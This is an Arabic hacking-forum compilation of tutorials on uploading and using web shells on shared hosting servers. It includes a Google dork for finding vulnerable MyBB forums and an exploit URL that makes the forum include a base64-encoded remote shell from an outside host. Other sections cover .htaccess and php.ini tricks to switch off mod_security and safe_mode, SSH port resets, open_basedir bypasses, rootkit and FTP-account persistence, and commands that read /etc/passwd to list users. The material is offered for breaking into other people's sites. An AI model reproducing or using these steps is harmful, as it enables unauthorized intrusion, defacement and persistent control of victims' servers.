اذاً تنفيذ الأوامر بالشل شبيه بالمثال ولنفترض ان السيرفر هو اخوك الصغير .. والعصير هو ملف ما .. والثلاجة هي الموقع الذي نريده .. وانت موجه الأوامر
بهذي الحالة يكون الأمر : طلب من السيرفر بأحضار "قراءة" الملف الموجود في الموقع المراد.
إن وجد الملف عرضه لك وأن لم يجده ماراح يعرض لك شي طبعاً
المثال اعلاه للتبسيط وإصال المعلومة فقط !
-------------
اوامر الشيل :-
safe mode : حالة الوضع الأمن (الحماية) وسيكون أمامها اما OFF أو ON
Disable functions : هنا الدوال المعطلة في السيرفر .
Run command : هنا تكتب الأمر الذي تريد تنفيذة او في شيلc99 تكون Execute Command
Work directory : هنا مسار تواجدك .
بعض المعلومات منقولة من mr.W olf
ولكن كتابه الدرس من كتابتي .. شكراً لكم
ممكن هده الصور تفيد بعض الأخوة المبتدئي
هده صور و اللي فيها الوضع الأمني و معلومات المقع متل اصدار القاعدة ونضام التشغيل اما للينكس اما ويندوز
http://www.atyafonline.com/vb/imgcache/3698.png
و هده الصورة للمكان المخصص لكتابة الاوامر
http://www.atyafonline.com/vb/imgcache/3699.png
و هده صورة الشل c99 بصفة عامة
http://www.atyafonline.com/vb/imgcache/3700.png
و هده صورة للشيل sniper_sa المعرب
http://www.atyafonline.com/vb/imgcache/3701.png
للاشارة فانه يوجد عدة أنواع من الشيلات
---------------------------------------------------------
[ من طرق رفع الشيلات . ] رفع شيل على myBB .[ للمبتدئين ] السلام عليكم
النهردة جايب لكم شرح لرفع الشيل ..
واخترت سكربتmyBB كـ . بدايه لكم
نبدأ على بركة الله . :
اول حاجة جبت لكم ثغرة للـmyBB كان مطروحة بالميلورم .
نبدأ على بركة الله
دورك البحث
كود PHP:
Powered By MyBB Copyright © 2002 inurl:forumdisplay.php?fid=2
حطة ف قوقل .. واختار اى موقع , واذا مظبطش موقع معين اختار غيرة حتى تلاقى موقع مصاب http://www.atyafonline.com/vb/imgcache/3707.png
ولمايطلعلك موقع مثال : -
www.xx.com/forum (http://www.xx.com/forum)
حط وراه الاستغلال
كود PHP:
forumdisplay.php?fid=2&sortby=];include(base64_decode(aHR0cDovL2RqZWttYW5pNGV2ZXI uZnJlZS5mci9zaGVsbC50eHQ));exit;//
لاحظ ان :
كود PHP:
aHR0cDovL2RqZWttYW5pNGV2ZXIuZnJlZS5mci9zaGVsbC50eH Q
تشفيرة للشل :
كود PHP:
http://djekmani4ever.free.fr/shell.txt
يعني لازم تشفر رابط الشيل قبل ماتعمله انكلود او لود .
مع ملاحظة اذاهتشفر غير الشل دة و تطلعلك بنتيجة التشفير علامة = احذفها وخد الباقي وحطة بنفس المكان....
تطبيق سريع :
http://www.atyafonline.com/vb/imgcache/3708.png
--------------------------------------------------------
تخطي تغيير مسار بورت الدخول للشل [ssh]
السلام عليكم
درسنا النهردة هو سهل وبسيط
في اغلب الاوقات لما يجيلك رووت سيرفر بأي طريقة ما .
تدخل اللوحة
وعاوز تغير الاندكسات تغير باسورد كل اف تي بي يدوي :s .
وطبعاً في حالة 500 موقع مش هتقدر تغير كلة
في الحالة دى هندخل للـPutty.
طب حطيت الاي بي عشان تدخل لروت .
هيقولك Connection refused او اى رسالة اخرى المهم انة مش هيرضى يدخلك
عشان بورت الشل الافتراضي متغير .
وزي ماحنا عارفين ان بورت الشل الافتراضي 22
في الحالة دى هنعمل كدة
هنضيف الرابط دة لخلف الاي بي
كود PHP:
http://ip:2086/******s2/doautofixer?autofix=safesshrestart
'طب اية فايدة الرابط دة ؟
هو انة هيعمل ريستارت وهيرجع البورت للافتراضي اللى هو 22 .
بعد لما تحط الرابط ورا الاي بي هيطلعلك كدة :
اقتباس Requesting ****** ... Done.
Executing ****** ...
Attempting to locate sshd binaries installed on the system ...
Located /usr/sbin/sshd
Done.
Killing exisiting sshd processes...
Stopping sshd: [ OK ]
killed 3422 Done.
حقوق الرابط محفوظة لـ كتب ومراجع اللينكس :D .
---------
رد: تخطي تغيير مسار بورت الدخول للشل [ssh]
مشكور
بس اذا عندك روت ليش تكشف نفسك بتغير البورت للافتراضي؟؟
كود PHP:
/etc/ssh/sshd_config
حتلاقي
كود PHP:
Port 5353
مثلا تروح تتصل عليه
و على العموم ssh فيه اعدادات كثيرة ﻻزم تنتبه لها
و على فكرة الطريقة الي ذكرتها فقط لـ Cpanel
مشكور مرة ثانية GoLdeN-z3r0
تحياتي
-------------
رد: تخطي تغيير مسار بورت الدخول للشل [ssh
اهلاً Cyber .
اناحاط الطريقة كـ بداية لـ انواع التخطي .
احنا ناخدها واحدة واحدة لحد لمانوصل لحل نهائي .
اساسأً اغلب الروت الاجنبيه بتكون 22
بس عادى يعنى كـ نقاش .
وشكرا ع الاضافة يامان
رد: تخطي تغيير مسار بورت الدخول للشل [ssh]
السلام عليكم
انا رفعت شل c99 على موقع ونجحت في ذلك ولكن لااعرف كيفية الدخول الى الشل و البدئ في الاختراق
اولاً على حسب اذا كنت رفعتة في FTP فـ اكيد انك رفعتة في البابلك [ public_html ] .
او اذا كنت رفعته من السكربت فـ على حسب مسار السكربت ونوع السكربت .
اذا كنت رفعته من الاف تي بي فـى هذا المسار public_html او www .
فـ راح يكون مسار الشيل
www.z3r0.com/shell.php (http://www.z3r0.com/shell.php)
http://sec-r1z.com/showthread.php?t=2601
---------------------------------------------------------
[تخطي ] What About Hataccess & PHP.ini
السلام عليكم
النهردة جآلي مزاج اكتب توبيك .
بأمكاننا اننا نعمل هوايل بملفات معينه زي الـهاتكس والـphp.ini
يعني مثال .
بعض النآس . الـphp.ini عندها مصدر رئيسي فى الاختراق يعني
رفع شيل
SafeMode=on اذاً يرفع php.ini
مظبطش يبقى يلا ودور ع سيرفر اخر ..
طب دلوقتى عندى فكره .
نفتح ملف هاتكس
ونكتب
كود PHP:
AddHandler cgi-script .cpc
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
suPHP_ConfigPath /home/user/public_html/php.ini
طيب تمام .
نرفع ملف الـphp.ini كالمعتاد
كود PHP:
safe_mode = Off
وخبروني نتيجة ^^
طبعاً الطريقه مجربه كذا مرة
ونسبة النجاح 99%
وهطرح موضوع للسيرفرات اللى تواجه مشاكل ف الهاتكس
----------------------------------------
الحقوق محفوظة :
z3r0
www.Sec-Evils.Com (http://www.sec-evils.com/)
SecurityEvils Gr0up
-------------------------------------------------------
السيرفرات نعرف معظمهما تنصب المود سيكيورتي Modsecurity
واللحين نجي نحلل الكود htaccess حقك خوي جولدن لنعرف وش الطريقة الي نستخدمها مع السيرفر
كود PHP:
AddHandler cgi-script .cpc
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
suPHP_ConfigPath /home/user/public_html/php.ini
الكود بلسطر الاول وهو بحالة منع السيرفر لتشغيل ملفات السي جي اي cgi telnet
طيب ضفنا الكود هاذ ببداية الهتاكس
كود PHP:
AddHandler cgi-script .cpc
هاذ الكود يعطينا المجال لنشغل اي ملف سي جي اي وبلمرفق تلقوا الشل الي اقصده وباسوورد دخول هو sec-r1z
هذا بلنسبة للكود الاول .. وهو خاص بتشغيل السي جي اي علسيرفر ذا كان ممنوع
نجي للمود بحالة السيرفر كان منصب الرولز للمود سيكيورتي علسيرفر ونبي نتخطاه
من خلال الكود هاذ
كود:
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheck******Format Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalize******s Off
</IfModule>
طبعا يقولون البعض من الي مايعرفون للرولز وش هو الرولز ؟ وش هو المود ؟ الامور هذه كلها جاية بلقسم هاذ وبنشرحها خطوة خطوة وبنشرح كيف بتضيفوا الرولز علسيرفر وكيفية تعطيله وكيفية تخطيه ... ولاكن هدفنا بلدروس هذه توصيل المعلومة من الصغير للكبيره للجميع
اللحين تمام ... عطلنا المود وفلترة المجلد الي حنا بيه .. لانه بلطبع عند اضافة ملف htaccess داخل مجلدنا مو معناته وقفنا حماية السيرفر كاملة .. ولكن وقفنا الحماية بلمجلد الي رفعنا الفايل عليه فقط ! يعني
كود:
home/sec-r1z/public_html/0x00
اللحين حنا داخل سيرفر sec-r1z.com
وبلضبط مسارنا داخل مجلد 0x00 علسيرفر , يعني وقت نرفع الفايل htaccess على مسار المجلد الي هو 0x00 راح يتم توقيف المود بلمجلد هاذ فقط ! وتشغيل السي جي اي تل نت علمجلد هاذ فقط ... للحين تمام ... وكل شي واضح ومبين
نجي للسطر الي بعده
طبعا الاغلبية ماتمشي على السيرفر لانه يحتاج يكون منصب فايل التعريف للموقع من ملف الاباتشي الي هو php.ini ومساره عادة بلسيرفر يكون
كود:
/etc/httpd/cond/httpd.conf
طيب ...
كود:
suPHP_ConfigPath /home/user/public_html/php.ini
والله بلضبط ماني ذاكر بس اذكر اني قرات موضوع للشباب باحد المنتديات يقولون وش سببه ... والي اذكره انه تخطي لحماية المود من خلال الملف php.ini هاذ بحالة كان موجود على مسار الموقع
يعني نفترض الملف موجود على هاذ المسار بلسيرفر
كود:
/home/user/public_html/php.ini
وحنا على هاذ المسار
كود:
/home/user/public_html/wehere
يعني الملف وظيفته انه يسحب الاعداد الرئيسي للسيرفر من
كود:
الى مجلدنا اي مسارنا
كود:
/home/user/public_html/wehere
بنقدر نتخطى اعدادات الملف الموجودة على المسار الرئيسي للموقع .
كود:
/home/user/public_html/php.ini
هذا تحليل الكود الاول للاخ جولدن والله اعلم .. الكود الثاني ببساطة
كود:
safe_mode = Off
بحيث يكون على مسارنا بإسم php.ini ومنه نقوم بتوقيف السيف مود علسيرفر إن كان مفعل ...
طبعا والله اعلم الكود الاول خاطىء ولاكن الاخوان قامو بجمع معلومات التخطي كاملة للسيرفرات ووضعها بكود واحد ..ز يعني إن صابت صابت وإن خابت خابت .. ولاكن الطريقة فعاله بإذن الله مع اني ماجربتها والله .. ولاكن كمعنى للاوامر ومهام لها اتوقع يتخطى الحماية وبلطبع في طرق ثانية بنقوم بشرحها بلدروس القادمة بإذن الله مع الايام ..
اللحين اي استفسار على شرح الاخ جولدن او شرحي حاظرين شباب .. ومايردكم الا لسانكم xD الملفات المرفقة
http://www.atyafonline.com/vb/imgcache/3689.png cgitelnet.zip (http://sec-r1z.com/attachment.php?attachmentid=118&d=1240611070) (6.2 كيلوبايت, المشاهدات 18)
ملف الهتاكس مايكون ممنوع يخوي , ذايكون معرف بملف الاباتشي httpd.conf يكون شغال ذامايكون معرف تشوف اذا تقدر تلعب بلphp.ini او انك تقرا ملف الاباتشي او ترفع سكربت php تتخطى حماية السيرفر عن طريق اي داله جديدة ...
شف الثغرات الموجودة هنا وبلاخص الي تكون اخرها bypass او اولها ...
http://www.milw0rm.org/related.php?program=PHP
http://sec-r1z.com/showthread.php?t=1283
----------------------------------------
تخطي الآوبن بآس دي عندما تكون صلاحيتك نوبدي ولاتستطيع التنقل
السلام عليكم .. :/>
اعذروني ع الانقطاع . بس مشاغل والله http://www.atyafonline.com/vb/imgcache/3703.png
ع العموم نبدأ بالدرس .
درس سهل وخفيف .
وهو يتكلم عندما تكون صلاحيتك nobody ولماتتنقل يديك انك متقدرش تتنقل [ اكنك يوزر]
ودة مايعرف بآلـOpenBaseDir >
,وتخطيهـآ سهل . وهو =)
مثلاً عندنا شل ع الموقع دة
www.r0xz3r0x.com/shell.php (http://www.r0xz3r0x.com/shell.php)
هيكون التخطي .
ip/~user/shell.php
نيجي نحلل اكتر
اية اللى انا كتبته دة
ip : اي بي السيرفر .
user : يوزر موقع r0xz3r0x .
وبعدين بقى مسآر الشيل عادى
وهتلاحظ انك لماتتنقل مش هتلاقى اى صعوبة .
مثال :
r0xz3r0x.com/shell.php
-
يوزر موقع r0xz3r0x.com هو Golden
الاي بي بتاع السيرفر : 201.123.456.89
مسار الشيل : shell.php
هيكون التخطي كالتالي
http://201.123.456.89 (http://201.123.456.89/)/~golden/shell.php
لاحظ لازم [ /~ ] عشان تربط بين اى بي السيرفر والموقع .
دلوقتى خلصت درسي .. واللى عندة اسئلة يتفضل يسئل
محدش يجي يقولي انا بتنقل متنقلتش لية وف الاخر تلاقى صلاحيته يوزر http://www.atyafonline.com/vb/imgcache/3694.pnghttp://www.atyafonline.com/vb/imgcache/3694.png
السلام عليكم
http://sec-r1z.com/showthread.php?t=2267
---------------------------------
من طرق البقاء على السيرفر اطول فتره .
السلام عليكم .
اولاً الموضوع لزيادة المعلومات .
نبدأ فى الموضوع .
في طرق كتيرة منها تقدر تزور السيرفر اكتر من مرة فى حال حذف الشيل ..
اولاً اول مايجيلك شيل
خمن الباسورد واغلب الاوقات يكون باسورد الاف تي بي مطابق لاي كونفيق لسكربت للموقع
----------------------------
طب عندك سي بنل موقع .. ادخل السي بنل
www.z3r0.com:2082 (http://www.z3r0.com:2082/)
بعدين FTP Accounts .
وبعدين تضيف يوزر وباسورد هيطلعلك زي الصورة دى .
http://www.9o9i.com/uploads/images/9o9i-a2d2b613f2.jpg (http://www.9o9i.com/uploads/images/9o9i-a2d2b613f2.jpg)
طب دة فى حالة انك شيل او سي بنل ,
----------
دلوقتى نيجي لحالة الرووت ..
لو انت root على السيرفر وعاوز تضمن انك ترجع للسيرفر كل شوية .
تقدر بواسطة الـ rootkit .
شرح بسيط للروت كيت
هو عبارة عن برنامج يأتي باشكال مختلفة ووظائف متعددة. يسمح للهاكرز اذا اخترق سيرفر واخذ رووت أن يحافظ له على الرووت وعلى أشياء اخرى.. كلمة Root تعني المسؤول عن النظام في لينكس مثل الـAdministratr الي في الويندوز ، وكلمة Kit تعني مجموعة من الأدوات مجمعة مع بعضها.
مكونات الرووت كيت [ لزيادة المعلومات ]
يتكون الـRK من الأشياء التالية [ راح نشرحها بالتفصيل ان شاء الله]:
1-الباكدور Backdoorz : بأنواعه المختلفة مثل "telnetd" ، "Login Backdor".
2-الـ Sniffers:التجسس على خدمات الشبكة مثل "FTP ، TELNET".
3-ادوات الـLogz : تقوم بالتعديل والمسح في اللوج حتى لا تنكشف.
4-ادوات DDOS : الي يسموها بالعربي " هجوم حجب الخدمة" شبيهه بالـPing في الدوس لكنها اقوى من الي في الويندوز بكثييير.
5-IRC/Bots.
6-السكربتات الخبيثة : زي بعض انواع الأكسبلويتات والسكربتات الي تخرب في النظام.
--
دلوقتى عرفنا بعض الطرق .. طبعاً دى طرق افتراضية يعني الـSecurity يقدر يتخلص من البرامج دى اذا عمل سكان على السيرفر بواسطة اى برنامج سكيورتي .. ومن البرامج دى AVG Anti-Rootkit Free .
المهم دلوقتى احنا عرفنا بعض الطرق اللى ممكن نتعامل بيها .
وفي الدروس القادمه اذا كان لينا عمر او في نفس الموضوع هشرح طرق جديدة .
والسلام عليكم
ممكن تلغم كل منتديات السيرفر من ملف faq مثلاً !!!
http://sec-r1z.com/showthread.php?t=2536
-----------------------------------------
طريقة كشف يوزر اى موقع على السيرفر في حالة
Access Denied . السلام عليكم
انا هشرح النهردة ازاي تكشف اى يوزر لموقع انت رافع عليه شيل
طبعاً في اغلب الاوقات .. الناس ترفع شيل في حالة الاستهداف تيجي تنفذ امر
يقولك : Access Denied . او يديك زي الصورة دى
(http://www.atyafonline.com/vb/imgcache/3704.png)
http://www.atyafonline.com/vb/imgcache/3704.png (http://www.atyafonline.com/vb/imgcache/3704.png)
'هشرح حل بسيط لكشف اليوزر لآي موقع
وهو امر :
كود PHP:
ls -la /etc/valiases/z3r0.com
نفذ الامر مع تغيير اسم z3r0.com لاسم الموقع اللى عاوز تطلع اليوزر بتاعه
هيديك الناتج :-
كود PHP:
-rw-r--r-- 1 z3r0 mail 902 Jul 2 12:51 /etc/valiases/z3r0.com
طبعاً في طرق كتيرة .. للتخطى ومنها
كود PHP:
cat /etc/passwd
وجرب يوزر يوزر http://www.atyafonline.com/vb/imgcache/3705.png بالطريقة دى
كود PHP:
ipserver/~user
ودى فى حالة ان السيرفر عدد سيرفراته قليل ..
و1% اللى سيرفراته كدة http://www.atyafonline.com/vb/imgcache/3705.png .
---------
طريقة حلوة ولاكن كيوزر لموقع علسيرفر صعب يتم منع اي nobody - apache للوصول له, لانه بكل بساطه معظمهم تلقاهم بملف الاباتشي, سواء كان عليه سي بانل للسيرفر او لا
كود:
cd /etc/httpd/conf;cat httpd.conf
وايضا طريقتك جميلة, بلإضافة للتاكد من عنوان الايبي للموقع بحالة ماقدرتوا تلاقوه والتاكد من ايبي سيرفرك, ذا كان نفسه ومالاقيتوه احتمال 50% يكون سيرفر jail account, اي كل حساب وله مساره وموديلاته الخاصه, او مجموعه خاصة, كله يعتمد على ذكاء وطريقة توزيع الادمن للمجموعات الي يسويها بلسيرفر, طبعا من خلال الايبي نقدر نحكم يا يكون سيرفر jail account,يا مغير اعدادات الاباتشي بكيفه ( الادمن ) Advanced security.
وفي طريقة ثانية عن طريق
كود PHP:
/var/mail
http://www.atyafonline.com/vb/imgcache/3706.png (http://smarterfox.com/wikisearch/search?q=%D9%88%D9%81%D9%8A%20%D8%B7%D8%B1%D9%8A%D 9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A%D8%A9%20%D8% B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D%0A%0D%0A%D9 %83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2Fmail%20%0D% 0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D9%88%D9%81%D9%8A%20%D8%B7%D 8%B1%D9%8A%D9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A% D8%A9%20%D8%B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D %0A%0D%0A%D9%83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2 Fmail%20%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D9%88%D9%81%D9%8A%20%D8%B7%D8%B1%D9%8A%D 9%82%D8%A9%20%D8%AB%D8%A7%D9%86%D9%8A%D8%A9%20%D8% B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%0D%0A%0D%0A%D9 %83%D9%88%D8%AF%20PHP%3A%0D%0A%2Fvar%2Fmail%20%0D% 0A)
طريقة اخرى :
ls -la /etc/valiases -user z3r0
http://www.atyafonline.com/vb/imgcache/3706.png (http://smarterfox.com/wikisearch/search?q=%D8%B7%D8%B1%D9%8A%D9%82%D8%A9%20%D8%A7%D 8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%20-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D8%B7%D8%B1%D9%8A%D9%82%D8%A 9%20%D8%A7%D8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%2 0-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D8%B7%D8%B1%D9%8A%D9%82%D8%A9%20%D8%A7%D 8%AE%D8%B1%D9%89%20%3A%0D%0A%0D%0Als%20-la%20%2Fetc%2Fvaliases%20-user%20z3r0%0D%0A)
الطريقة اللى حطتها فوق دى .
تكشف لك يوزر الموقع دة لاي موقع
يعني لو على سيرفر انت ونفذت cat /etc/passwd .
هيطلعلك نتائج
خد اى يوزر ونفذ
ls -la /etc/valiases -user siteuser
وهيطلعلك اسم الموقع الخاص باليوزر دة
كمان مرات كثيرة لاتستطيع قراءة
/etc/passwd
بالامر المعتمد cat /etc/passwd
او ln -s /etc/passwd r1z.txt
بسبب منع بعض الاوامر بالسيرفر
الحل تنفيذ الامر هذا
awk -F: '{ print $1 }' /etc/passwd | sort
ولو بدنا نعرض اليوز مع المسارات
ننفذ هذا الامر
awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc/passwd | sort
انشا الله نكون افدناكم
http://sec-r1z.com/showthread.php?t=2358
---------------------------------------------------------------
تخطي الحماية بواسطة بعض الآوامر
[ Easy & Intersting ]
السلام عليكم ورحمة الله وبركآتة
كيفكم اخواني ..
اولاً :-
اعتذر عن عدم تقديم بقية دروس الدورة ولكن مشاغل والله
المهم ..
نبدأ الان ف الدرس :-
الدرس هو [ فكرة ] تقريبأً وممكن نعيش عليها --
نبدأ على بركة الله ..
فى بعض السيرفرات لماتيجي تنفذ امر [ ls -la /etc/passwd ] - يديك access denied او نافذة مفهاش كتابه او اى حاجة ..
و لو كتبت cat /etc/passwd نفس الكلام .
المهم :-
هنا تقريباً في حل . فى بعض السيرفرات
etc passwd :D - - -
كود:
awk -F: '{ print $1 }' /etc*/passwd | sort
etc /passwd 2 but intersting - هنا يديك المواقع معاه .
كود:
awk -F: '{ print $1 " "$2 " " $3" "$4" "$5 " "$6" "$7" "}' /etc*/passwd | sort
ترقبوناّ في حلقات اخرى :D
./z3r0
SecurityRules
sec-r1z.com
وتقدر عن طريق الامر هذا بكل بساطة
كود:
cd /etc;cat passwd
http://www.atyafonline.com/vb/imgcache/3709.png (http://smarterfox.com/wikisearch/search?q=%D9%88%D8%AA%D9%82%D8%AF%D8%B1%20%D8%B9%D 9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8%A7%D9%84%D8% A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20%D8%A8%D9%83 %D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A9%0D%0A%0D%0 A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%20%2Fetc%3Bca t%20passwd%0D%0A%0D%0A&locale=en-US)http://www.youtube.com/favicon.ico (http://www.youtube.com/results?search_query=%D9%88%D8%AA%D9%82%D8%AF%D8%B 1%20%D8%B9%D9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8% A7%D9%84%D8%A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20 %D8%A8%D9%83%D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A 9%0D%0A%0D%0A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%2 0%2Fetc%3Bcat%20passwd%0D%0A%0D%0A)http://www.google.com/favicon.ico (http://www.google.com/search?q=%D9%88%D8%AA%D9%82%D8%AF%D8%B1%20%D8%B9%D 9%86%20%D8%B7%D8%B1%D9%8A%D9%82%20%D8%A7%D9%84%D8% A7%D9%85%D8%B1%20%D9%87%D8%B0%D8%A7%20%D8%A8%D9%83 %D9%84%20%D8%A8%D8%B3%D8%A7%D8%B7%D8%A9%0D%0A%0D%0 A%D9%83%D9%88%D8%AF%3A%0D%0A%0D%0Acd%20%2Fetc%3Bca t%20passwd%0D%0A%0D%0A)
في كمان
كود PHP:
ls -la /etc/valiases/xxx.com
cat /etc/valiases/xxx.com
بس اذا كانت الصلاحيات على الملف
كود PHP:
/etc/passwd
وﻻ على الامر cat
اذا كانت الصلاحيات ما تقدر تقراه بأي امر اﻻ اذا فيه ثغرة
اما اذا كان عامل صلاحيات على cat فالطريقة تكون فعال
من الناحية هذه ياسايبر تقدر تستخدم التخطي عن طريق داله معينه مثلا ,,, او اذا جبت باسوورد للسيكيول تقدر تتخطاها بصلاحية السيكيول ( كيوزر ) ... اذكر موضوع للدكتور ناقشنا فيه عن الصلاحيات للسيكيول ( كيوزر ) للوصول كروت ... لاكن ماوصلنا لنتيجة فيها بس الفكره تزبط اكيد !
لو معاك اي معلومات قاعدة تتخطى المشكلة من دالة mysql
http://sec-r1z.com/showthread.php?t=2040